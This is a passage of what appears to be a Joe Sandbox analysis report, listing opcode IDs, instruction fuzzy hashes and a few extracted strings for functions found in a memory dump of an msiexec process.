                  • Instruction Fuzzy Hash: C6518174E112189FDB48DFA9D9949DDBBF2FF89300F208169E809AB364DB31A901CF50
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43a5b2bbeffe307898499771d7e136eb2dbcb804bc383c33cb33e95295b8a10f
                  • Instruction ID: f39c5f4d9605c460d04edc8485cd1b34364a24c771a57e48ae3e1a2b8adc1f44
                  • Opcode Fuzzy Hash: 43a5b2bbeffe307898499771d7e136eb2dbcb804bc383c33cb33e95295b8a10f
                  • Instruction Fuzzy Hash: 8451B275E01208CFDB09DFA9D49499DBBB2FF8D300F208469E819AB324DB35A946CF40
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c501ed57283dd69a067f0cbdfa3586b342951b8f7f769aa67b318f360273ee1
                  • Instruction ID: f9aeda5bb0fa89d21d712d433e92885f012ac6e6b6061b64526de02137ec84e3
                  • Opcode Fuzzy Hash: 9c501ed57283dd69a067f0cbdfa3586b342951b8f7f769aa67b318f360273ee1
                  • Instruction Fuzzy Hash: 97519075E01208CFDB09DFA9D49099DBBB2FF8D300F209469E919AB364DB35A946CF50
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9b59eb970deac757a71b282c156d6ff6523b9f379328963abf3838bdaab7a42d
                  • Instruction ID: c1210a8061e10ffe7e33993fec1ddd9b8ffbee5c1f60e6d766a773667deb5a13
                  • Opcode Fuzzy Hash: 9b59eb970deac757a71b282c156d6ff6523b9f379328963abf3838bdaab7a42d
                  • Instruction Fuzzy Hash: D6518474E01218DFDB48DFAAD59499DBBF2FF89300F209169E419AB364DB30A945CF50
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 561ca42f13df107df1d1b017cfcb232cc461098452c5a190d9acd91fa07aeb5b
                  • Instruction ID: ca85b0b0e021e82754dcf8c3b0f2cff6bcd1da76fcc80286d3c19cfbc0fbc396
                  • Opcode Fuzzy Hash: 561ca42f13df107df1d1b017cfcb232cc461098452c5a190d9acd91fa07aeb5b
                  • Instruction Fuzzy Hash: DA21F171A001059FCB15EF74C4909AE37A6EB9D268F10C01DD94A9B380DF39EE42CBD2
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c0c0d6fc8a9467778f397ddc288e83fc3ce8e752e80c4a94c44dcffd2e27480
                  • Instruction ID: c74a94445096174f8b8b466b002c790182a59cacd33add4ffd91fc1a545d6f64
                  • Opcode Fuzzy Hash: 4c0c0d6fc8a9467778f397ddc288e83fc3ce8e752e80c4a94c44dcffd2e27480
                  • Instruction Fuzzy Hash: CF214935A41209CFEB09DFB0D450AEDB7B2FB8A300F50A428D40173394CB399946CF65
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 31b79eec09046a606eb8f9c534ffb61fcaf3e4d6774f88481eaa1976d6af6f4f
                  • Instruction ID: b39b71706e47926de5aea247264b840098994076e9f596654f844aabb7b80f29
                  • Opcode Fuzzy Hash: 31b79eec09046a606eb8f9c534ffb61fcaf3e4d6774f88481eaa1976d6af6f4f
                  • Instruction Fuzzy Hash: 50214331D50209DEDB01EFE9D804AECFBB5FF5A300F509629E51577254EB30AA8ACB80
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 325e92196b492f9848ab448bf778ba631eedfcd6e8e2dbbf4f63a1f80dded3c9
                  • Instruction ID: be7b455a1041d3531b04a388158d56890fe1625cbe9e9a6efac8570064701b5e
                  • Opcode Fuzzy Hash: 325e92196b492f9848ab448bf778ba631eedfcd6e8e2dbbf4f63a1f80dded3c9
                  • Instruction Fuzzy Hash: F31189B2F442199FCB01DBF8DC008DEBBB1FF89210B208356D516BB151E6351906CBA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6bb51a541c0a1090f0c64d7bf0c5b172e12e675ad9155da5da144f10eb65cbdc
                  • Instruction ID: 0ba28e469c30e94bf01ee426b2335adb54869fa04c37001ebe87f8f21f5d950c
                  • Opcode Fuzzy Hash: 6bb51a541c0a1090f0c64d7bf0c5b172e12e675ad9155da5da144f10eb65cbdc
                  • Instruction Fuzzy Hash: 5B211735A41208CFDB09DFB4D850AEEB7B2FB89300F509428D80573394DB39A941CF65
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5698d96e0379b444e477aaef3b78b7f42c1fbd47e41b830d0dba4a2adabad174
                  • Instruction ID: adfe8ad92e454a79e86fedf506f6f7e07989d1b6c32a1c1ab98dd03c8315ed8b
                  • Opcode Fuzzy Hash: 5698d96e0379b444e477aaef3b78b7f42c1fbd47e41b830d0dba4a2adabad174
                  • Instruction Fuzzy Hash: 2E2100B9D0420A8FDB41EFA8C9454EEBFF1FF09301F10526AE806B3210EB345A45CBA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 175229f150cb6028ffe06a85e76a96f21df1d5930b0285dd7b271a444283181e
                  • Instruction ID: 612dbaaaf59993d37e2cddb3be7504de628a7b15c5452e9e63fa33dd2f9dd9be
                  • Opcode Fuzzy Hash: 175229f150cb6028ffe06a85e76a96f21df1d5930b0285dd7b271a444283181e
                  • Instruction Fuzzy Hash: 2E2138B5D042098FDB02DFA8C5445EDBFF0FF4A315F1041AAD455B7254EB301945CB91
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73abf5610ebf9df13c610c7360fa8fc506af6eec6b4494810268d7c9a6fca594
                  • Instruction ID: 7813afa116a9e088126b1c878dca0b7b2251e05a62d9e6535107289a4c278bdd
                  • Opcode Fuzzy Hash: 73abf5610ebf9df13c610c7360fa8fc506af6eec6b4494810268d7c9a6fca594
                  • Instruction Fuzzy Hash: 49012DB2B440146FEB018E55D810BEF3FA7DBC9351F14806AFA06DB244CA71CC01C791
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3a88db57609fb4b7607a9c46278bd530442861ed49f877f468981fb802ea4f8
                  • Instruction ID: 4614a1090b9ff7417fa579bb900851feaf4d6cc955299264bd4480a0aaed0f41
                  • Opcode Fuzzy Hash: e3a88db57609fb4b7607a9c46278bd530442861ed49f877f468981fb802ea4f8
                  • Instruction Fuzzy Hash: D611C0B5D002098FDB41EFA8C9455EEBBF1FF49301F10516AE81AB2214EB345A85CFA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9503142c36afbb1fb8a58526d7bc3f8a69303b61b7b206fcbb80699816f2169
                  • Instruction ID: cf1c02be19a1db7132e81b1283944ba25672e951b822cd6f2a87687cab65102e
                  • Opcode Fuzzy Hash: d9503142c36afbb1fb8a58526d7bc3f8a69303b61b7b206fcbb80699816f2169
                  • Instruction Fuzzy Hash: F5E0D836E2826757CB11EBB098060DDBB34EE92254B514A76D1A477141EB60961BC392
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5305733d4b3251e1c938870e581c1596237759023424cccfb931f79a0befa7bb
                  • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                  • Opcode Fuzzy Hash: 5305733d4b3251e1c938870e581c1596237759023424cccfb931f79a0befa7bb
                  • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea12a2408de9d2ad90e398e06e115036085fa5d85f8032afb5c0fecee2e0c597
                  • Instruction ID: a299123ae8034ca9bcc2a96d4110ec7776ffeb0cde438856b755d5c8f899648f
                  • Opcode Fuzzy Hash: ea12a2408de9d2ad90e398e06e115036085fa5d85f8032afb5c0fecee2e0c597
                  • Instruction Fuzzy Hash: 7DD0677BB410589FCB049F98E8409DDB7B6FB9C222B448126F916A3265C6359921DB50
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8636694e7c576a7489312f347ae74b4e705cc1a10e1788200e6a719947296dd7
                  • Instruction ID: eb4e43b02740e4e7ddbdf67d47c570978dfb051becdb7aba5cc19b54b74f2073
                  • Opcode Fuzzy Hash: 8636694e7c576a7489312f347ae74b4e705cc1a10e1788200e6a719947296dd7
                  • Instruction Fuzzy Hash: F6C012701043194BC555E775E955955775BE7E0302F409960B60E0A119DE7D3C8457A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID: (o^q$(o^q$,bq$,bq
                  • API String ID: 0-879173519
                  • Opcode ID: 414fba3d44be8ebb36b551029a57acc02a8cbd01d3a4b48b70631d6d763ffcab
                  • Instruction ID: 03109fc5ab5556f3f827933a6fbf11260ab9c6ef5deb9f7df664517676dbc933
                  • Opcode Fuzzy Hash: 414fba3d44be8ebb36b551029a57acc02a8cbd01d3a4b48b70631d6d763ffcab
                  • Instruction Fuzzy Hash: A5D169B0A50109DFEB01CFA9C984A9DBFF6FF88B44F1580A5E916AB265D730ED41CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                  • API String ID: 0-1932283790
                  • Opcode ID: a9c3f06ebd56275f447c8485132831bffd97ba50fd9972fcfa18660fe0ecc012
                  • Instruction ID: f31914ae1a4971c1eb89535f3043211bb304988b09cceb733f85ac4b812d73c4
                  • Opcode Fuzzy Hash: a9c3f06ebd56275f447c8485132831bffd97ba50fd9972fcfa18660fe0ecc012
                  • Instruction Fuzzy Hash: CE125A70A406098FDB15CF69C885E9EBBF2FF48719F1085A9E91ADB261DB30ED41CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd
                  Similarity
                  • API ID:
                  • String ID: \;^q$\;^q$\;^q$\;^q
                  • API String ID: 0-3001612457
                  • Opcode ID: 064432c86b66410318da169772286ebe2b193684a723da265eea953e60b3c527
                  • Instruction ID: 18adf8c58f2e34af7b4532de436a0f79953e9ce57fb415896691dc87ca80de20
                  • Opcode Fuzzy Hash: 064432c86b66410318da169772286ebe2b193684a723da265eea953e60b3c527
                  • Instruction Fuzzy Hash: BB01B1B17A00149FDBA58E3CC444D0637EBAF88F65B2141BAE502CB3B1DA71DC418740